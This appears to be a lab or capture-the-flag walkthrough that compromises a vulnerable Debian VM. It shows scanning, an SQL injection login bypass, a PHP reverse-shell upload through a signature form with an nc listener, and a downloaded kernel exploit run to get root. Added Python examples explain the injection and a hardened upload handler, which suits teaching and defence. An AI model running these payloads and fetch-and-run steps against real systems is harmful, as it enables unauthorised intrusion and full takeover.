Looking for our target:
root@osboxes:~# nmap -sn 192.168.1.0/24
OK, from scanning our subnet we know that our target has the IP 192.168.1.103.
What kind of services are running on our target?
root@osboxes:~# nmap -sV -A 192.168.1.103
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 15:32 GMT
Nmap scan report for 192.168.1.103
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 8c:77:73:be:0d:a8:d5:7f:d8:b7:27:30:ed:52:85:23 (DSA)
|_ 2048 8b:df:2d:cd:cb:d1:5e:a8:8e:70:93:2d:a6:5f:f1:3c (RSA)
25/tcp open smtp Exim smtpd 4.50
| smtp-commands: localhost.localdomain Hello nmap.scanme.org [192.168.1.104], SIZE 52428800, PIPELINING, HELP,
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-24+lenny4
| mysql-info:
| Protocol: 53
| Version: .0.51a-24+lenny4
| Thread ID: 33
| Capabilities flags: 41516
| Some Capabilities: Support41Auth, SupportsCompression, SupportsTransactions, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
| Status: Autocommit
|_ Salt: PR//?/jL{G0XLS<sProU
7777/tcp open cbt?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port7777-TCP:V=6.47%I=7%D=2/1%Time=56AF7AA0%P=i686-pc-linux-gnu%r(NULL,
SF:D,"HELO\nCOMMAND:")%r(X11Probe,14,"HELO\nCOMMAND:RECV:\x20l")%r(Socks5,
SF:15,"HELO\nCOMMAND:RECV:\x20\x05\x04")%r(Arucer,3E,"HELO\nCOMMAND:RECV:\
SF:x20\xc2\xe5\xe5\xe5\x9e\xa0\xd7\xa4\xa6\xd0\xd5\xdd\xdc\xc8\xd6\xdd\xd7
SF:\xd5\xc8\xd1\xd6\x83\x80\xc8\xdd\xa4\xd1\xa1\xc8\xa4\xd2\xd5\xd7\xdd\xa
SF:3\xa4\xa1\xdd\xa6\xd7\xdd\x98\xe5")%r(GenericLines,17,"HELO\nCOMMAND:RE
SF:CV:\x20\r\n\r\n")%r(GetRequest,25,"HELO\nCOMMAND:RECV:\x20GET\x20/\x20H
SF:TTP/1\.0\r\n\r\n")%r(HTTPOptions,29,"HELO\nCOMMAND:RECV:\x20OPTIONS\x20
SF:/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,29,"HELO\nCOMMAND:RECV:\x20OPTIO
SF:NS\x20/\x20RTSP/1\.0\r\n\r\n")%r(RPCCheck,14,"HELO\nCOMMAND:RECV:\x20\x
SF:80")%r(DNSVersionBindReq,13,"HELO\nCOMMAND:RECV:\x20")%r(DNSStatusReque
SF:st,13,"HELO\nCOMMAND:RECV:\x20")%r(Help,19,"HELO\nCOMMAND:RECV:\x20HELP
SF:\r\n")%r(SSLSessionReq,15,"HELO\nCOMMAND:RECV:\x20\x16\x03")%r(Kerberos
SF:,13,"HELO\nCOMMAND:RECV:\x20")%r(SMBProgNeg,13,"HELO\nCOMMAND:RECV:\x20
SF:")%r(FourOhFourRequest,48,"HELO\nCOMMAND:RECV:\x20GET\x20/nice%20ports%
SF:2C/Tri%6Eity\.txt%2ebak\x20HTTP/1\.0\r\n\r\n")%r(LPDString,1C,"HELO\nCO
SF:MMAND:RECV:\x20\x01default\n")%r(LDAPBindReq,1E,"HELO\nCOMMAND:RECV:\x2
SF:00\x0c\x02\x01\x01`\x07\x02\x01\x02\x04")%r(SIPOptions,D,"HELO\nCOMMAND
SF::")%r(LANDesk-RC,18,"HELO\nCOMMAND:RECV:\x20TNMP\x04")%r(TerminalServer
SF:,14,"HELO\nCOMMAND:RECV:\x20\x03")%r(NCP,17,"HELO\nCOMMAND:RECV:\x20Dmd
SF:T")%r(NotesRPC,14,"HELO\nCOMMAND:RECV:\x20:")%r(WMSRequest,14,"HELO\nCO
SF:MMAND:RECV:\x20\x01")%r(oracle-tns,13,"HELO\nCOMMAND:RECV:\x20")%r(afp,
SF:13,"HELO\nCOMMAND:RECV:\x20")%r(kumo-server,14,"HELO\nCOMMAND:RECV:\x20
SF:\x94");
MAC Address: 00:0C:29:47:61:1C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.5 - 2.6.12
Network Distance: 1 hop
Service Info: Host: localhost.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: DEBIAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
Excellent, we have got a lot of interesting information: old Debian lenny packages (Apache 2.2.9 with PHP 5.2.6, MySQL 5.0.51a, Exim 4.50, the +lenny suffixes give it away), SMB with message signing disabled, an OS fingerprint in the 2.6.5 - 2.6.12 range (worth remembering when we get to privilege escalation), and an unrecognised service on 7777/tcp which, as the fingerprint shows, greets every connection with HELO\nCOMMAND: and echoes back whatever nmap sent after RECV:. As always, let's open the web application in the browser.
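The fingerprint nmap printed for 7777/tcp is worth reading rather than skipping: nmap wraps it at 72 columns with an SF: prefix on continuation lines, and each %r(Probe,hexlen,"response") record is what the service answered to one of nmap's probes, with non-printable bytes escaped. The parser below is an added example (it is not part of the original write-up and not nmap's own code): it joins the wrapped lines, decodes the escapes, checks each record's decoded length against the hex length nmap recorded, and shows that every answer is the banner HELO\nCOMMAND: followed by RECV: and an echo of the probe. The excerpt of the fingerprint is copied from the scan output above and re-wrapped; the escape conventions assumed are nmap's (\xHH, \n, \r, \t, and a backslash before regex metacharacters such as the dot).

```python
import re

# Excerpt of the 7777/tcp service fingerprint from the nmap output above
# (re-wrapped, so it also exercises the "SF:" continuation handling).
FINGERPRINT = r"""SF-Port7777-TCP:V=6.47%I=7%D=2/1%Time=56AF7AA0%P=i686-pc-linux-gnu%r(NULL,
SF:D,"HELO\nCOMMAND:")%r(X11Probe,14,"HELO\nCOMMAND:RECV:\x20l")%r(GenericLines,17,"HELO\nCOMMAND:RE
SF:CV:\x20\r\n\r\n")%r(GetRequest,25,"HELO\nCOMMAND:RECV:\x20GET\x20/\x20H
SF:TTP/1\.0\r\n\r\n")%r(Help,19,"HELO\nCOMMAND:RECV:\x20HELP
SF:\r\n")%r(SSLSessionReq,15,"HELO\nCOMMAND:RECV:\x20\x16\x03")%r(FourOhFourRequest,48,"HELO\nCOMMAND:RECV:\x20GET\x20/nice%20ports%
SF:2C/Tri%6Eity\.txt%2ebak\x20HTTP/1\.0\r\n\r\n")%r(LPDString,1C,"HELO\nCO
SF:MMAND:RECV:\x20\x01default\n");"""

_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "0": "\0"}
_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})|\\(.)")
_RESP = re.compile(r'%r\(([\w-]+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')


def join_wrapped(text):
    """Undo nmap's 72-column wrapping: the first line starts with 'SF-Port',
    every continuation line with 'SF:'.  A wrap can fall in the middle of an
    escape such as '\\x20', so lines must be joined before unescaping."""
    pieces = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("SF-Port"):
            pieces.append(line)
        elif line.startswith("SF:"):
            pieces.append(line[3:])
        elif line:
            raise ValueError("not a fingerprint line: " + line)
    return "".join(pieces)


def unescape(raw):
    """Decode nmap's response escaping: \\xHH for non-printables, \\n \\r \\t,
    and a backslash before regex metacharacters (\\. \\( ...) meaning the literal."""
    def one(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return _SIMPLE.get(m.group(2), m.group(2))
    return _ESC.sub(one, raw)


def parse_fingerprint(text):
    """Return (port, {probe name: decoded response}).  The hex length nmap
    wrote into each %r(...) record is checked against the decoded data."""
    joined = join_wrapped(text)
    port = int(re.match(r"SF-Port(\d+)-", joined).group(1))
    responses = {}
    for name, hexlen, raw in _RESP.findall(joined):
        data = unescape(raw)
        if len(data) != int(hexlen, 16):
            raise ValueError(f"{name}: decoded {len(data)} bytes, expected {int(hexlen, 16)}")
        responses[name] = data
    return port, responses


def banner_and_echo(responses):
    """The NULL probe (connect, send nothing) yields the banner; for every other
    probe the part after the banner is the service's reaction.  Returns the
    banner and, per probe, the bytes echoed after 'RECV: ' (None if no echo)."""
    banner = responses["NULL"]
    echoed = {}
    for name, data in responses.items():
        if name == "NULL":
            continue
        tail = data[len(banner):]
        echoed[name] = tail[len("RECV: "):] if tail.startswith("RECV: ") else None
    return banner, echoed


if __name__ == "__main__":
    port, resp = parse_fingerprint(FINGERPRINT)
    banner, echoed = banner_and_echo(resp)
    print(f"port {port}: banner {banner!r}")
    for name, payload in echoed.items():
        print(f"  {name:18} echoed {payload!r}")
```

Running it shows, for example, that the GetRequest probe got back exactly "GET / HTTP/1.0\r\n\r\n" after the RECV: prefix and the X11Probe only its first byte "l" (the probe continues with a NUL, so the service appears to treat input as a C string). A service that reflects raw input like this is a natural next target for manual poking with nc, but the rest of this walkthrough goes through the web application instead.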
Nothing special :-) But below all the posts there is also a link, Post new entry! Hmmm, OK, before running dirbuster, let's examine the link.
I examined this web-based form in the following way:
Username: admin
Password: admin' OR 1=1 -- -
Title: test
Content: <?php echo "test"; ?>
But unfortunately my post was validated and the part <?php was removed from the content of my post. At least we know that the Password field is vulnerable to SQL injection.
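To see why that password gets us past the login, here is an added example (not the application's code, whose source was never shown): a toy login in Python with sqlite3, with a string-concatenated query modelled on the usual PHP pattern (an assumption about the real query) beside a parameterized one. The user table and passwords are constructed for the demo.

```python
import sqlite3

# Constructed sample data, not from the target.
USERS = [(1, "admin", "s3cret"), (2, "bob", "hunter2")]

PAYLOAD = "admin' OR 1=1 -- -"   # the password typed into the form above


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def build_query(username, password):
    """The vulnerable pattern (assumed shape): user input pasted into the SQL text."""
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def login_vulnerable(username, password):
    """Return the username the concatenated query 'authenticates', or None."""
    row = _db().execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(username, password):
    """Same check with bound parameters: the quote in the payload is data, not SQL."""
    row = _db().execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(build_query("admin", PAYLOAD))
    # ... WHERE username='admin' AND password='admin' OR 1=1 -- -'
    # AND binds tighter than OR, so this reads (false) OR (true) for every row,
    # and the comment swallows the closing quote the application appended.
    print("vulnerable   :", login_vulnerable("admin", PAYLOAD))     # admin
    print("any username :", login_vulnerable("nobody", PAYLOAD))    # admin
    print("parameterized:", login_parameterized("admin", PAYLOAD))  # None
    print("real password:", login_parameterized("admin", "s3cret")) # admin
```

Two details of the payload matter in practice: the tautology returns every row, so whichever user sorts first (here admin) is the one you become, and the trailing "-" after "--" is there because MySQL only treats "--" as a comment when whitespace follows it, and that whitespace is easily trimmed by a form or proxy on the way in.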
OK, what else can we do? Hmmm, Change profile settings! looks very interesting :-)
Let's try the same technique... OK, I got the following response:
Authenticated.Your signature has successfully been entered updated.
Good, but I don't know where the signature is stored. Maybe Burp Suite will be useful in our case. In the meantime let's run dirbuster.
We can see that our script is not validated by the web application (it is only encoded), and that it is inserted into the sig.txt file.
Dirbuster result:
The repo directory may be helpful for us, and the profiles directory as well as admin.
OK, now I am looking for my sig.txt file...
Great! I have found our script in the profiles directory!
So, now let's submit the web-based form again, but this time we edit the file name from sig.txt to shell.php, copy the content of /usr/share/webshells/php/php-reverse-shell.php, edit $ip and $port, and paste it into the web form. Start a listener on that port (for example nc -lvp <port>) before triggering the shell.
Excellent, now we have to find /profiles/admin-shell.php and execute it.
Result:
We have got a limited shell :-)
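What makes this work is that the signature handler lets the client choose the file name, so a .php name puts attacker-controlled content inside the web root where Apache executes it. The following added example (not the application's code) models that handler in Python beside a hardened version that chooses the file name and extension itself, whitelists the username so it cannot carry a path, and escapes the signature on output instead of trusting it. The profiles/<user>-<name> layout is inferred from the /profiles/admin-shell.php path above, the username policy is an assumption, and a temp directory stands in for the web root.

```python
import html
import os
import re
import tempfile

# A temp directory stands in for the application's web-root "profiles/" directory.
PROFILES = tempfile.mkdtemp()

# Assumed username policy for the hardened version.
_USER = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def is_valid_user(user):
    return _USER.match(user) is not None


def save_signature_vulnerable(user, filename, content):
    """Models the handler the walkthrough abuses: the client-supplied file name
    (sig.txt by default, shell.php once edited in Burp) decides the extension,
    and the raw content is written inside the web root, where Apache runs *.php.
    A filename such as ../x would also escape the profiles directory."""
    path = os.path.join(PROFILES, f"{user}-{filename}")
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)
    return path


def save_signature_hardened(user, filename, content):
    """Hardened variant: the server fixes both name and extension (the client's
    filename is deliberately ignored), the username is whitelisted so it cannot
    smuggle a path, and the content is stored verbatim but only ever rendered
    escaped.  Storing signatures outside the document root would be better still."""
    if not is_valid_user(user):
        raise ValueError("invalid username")
    path = os.path.join(PROFILES, f"{user}-sig.txt")
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)
    return path


def render_signature(path):
    """Escape on output, so <?php ... ?> or <script> in a signature is shown as text."""
    with open(path, encoding="utf-8") as f:
        return html.escape(f.read())


def is_executable_by_apache(path):
    """Crude stand-in for Apache's handler mapping: only the extension matters."""
    return path.lower().endswith((".php", ".phtml", ".php5"))


if __name__ == "__main__":
    payload = '<?php echo "test"; ?>'
    bad = save_signature_vulnerable("admin", "shell.php", payload)
    good = save_signature_hardened("admin", "shell.php", payload)
    print(bad, is_executable_by_apache(bad))      # .../admin-shell.php True
    print(good, is_executable_by_apache(good))    # .../admin-sig.txt False
    print(render_signature(good))                 # &lt;?php echo &quot;test&quot;; ?&gt;
```

The "only encoded" behaviour seen in Burp is the escape-on-output half done right; the half that was missing is refusing to let the client pick where and under what extension the bytes land.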
As always, let's run the command:
www-data@debian:/tmp$ uname -a
uname -a
Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
Good, a 2.6.8 kernel from 2005 (consistent with the 2.6.5 - 2.6.12 range nmap guessed); now we have to find an appropriate exploit to escalate our privileges :-)
Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)
OK, let's play ball!
www-data@debian:/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
--10:00:17-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
=> `9574.tgz'
Resolving github.com... 192.30.252.130
Connecting to github.com[192.30.252.130]:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz [following]
--10:00:18-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz
=> `9574.tgz'
Resolving raw.githubusercontent.com... 185.31.17.133
Connecting to raw.githubusercontent.com[185.31.17.133]:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,359 [application/octet-stream]
100%[====================================>] 4,359 --.--K/s
10:00:18 (94.48 MB/s) - `9574.tgz' saved [4359/4359]
www-data@debian:/tmp$ ls
ls
9574.tgz
www-data@debian:/tmp$ tar zxvf 9574.tgz
tar zxvf 9574.tgz
therebel/
therebel/exploit.c
therebel/pwnkernel.c
therebel/therebel.sh
www-data@debian:/tmp$ cd therebel
cd therebel
www-data@debian:/tmp/therebel$ ls
ls
exploit.c pwnkernel.c therebel.sh
www-data@debian:/tmp/therebel$ bash therebel.sh
Game Over!
And BOOM!! One caveat for anything outside a lab: kernel exploits like this one can take the box down instead of handing over root, so on a real engagement read the source first and make sure a crash is acceptable before running it.